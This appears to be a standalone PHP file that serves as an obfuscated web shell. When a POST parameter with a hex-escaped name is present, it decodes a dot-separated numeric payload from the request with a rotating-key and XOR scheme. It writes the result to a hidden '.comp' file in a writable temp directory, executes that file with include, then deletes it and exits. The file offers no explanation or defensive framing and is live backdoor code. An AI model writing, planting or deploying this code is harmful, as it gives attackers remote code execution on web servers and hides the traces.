<?php

if(filter_has_var(INPUT_POST, "r\x65\x63")){
	$token = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/tmp"]);
	$symbol = $_REQUEST["r\x65\x63"];
		$symbol=explode("." 	, 	$symbol  	); 
	$hld = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt5);
            $n = 0;
    
            foreach($symbol as $v7) {	 $sChar = ord($salt5[$n		%  $sLen]);
                $d =((int)$v7 - $sChar -($n		%  10)) ^ 30;
                $hld.=  chr($d);
                $n++;  }	
	foreach ($token as $value) {
    		if (array_product([is_dir($value), is_writable($value)])) {
    $ent = vsprintf("%s/%s", [$value, ".comp"]);
    if (@file_put_contents($ent, $hld) !== false) {
	include $ent;
	unlink($ent);
	exit;
}
}
}
}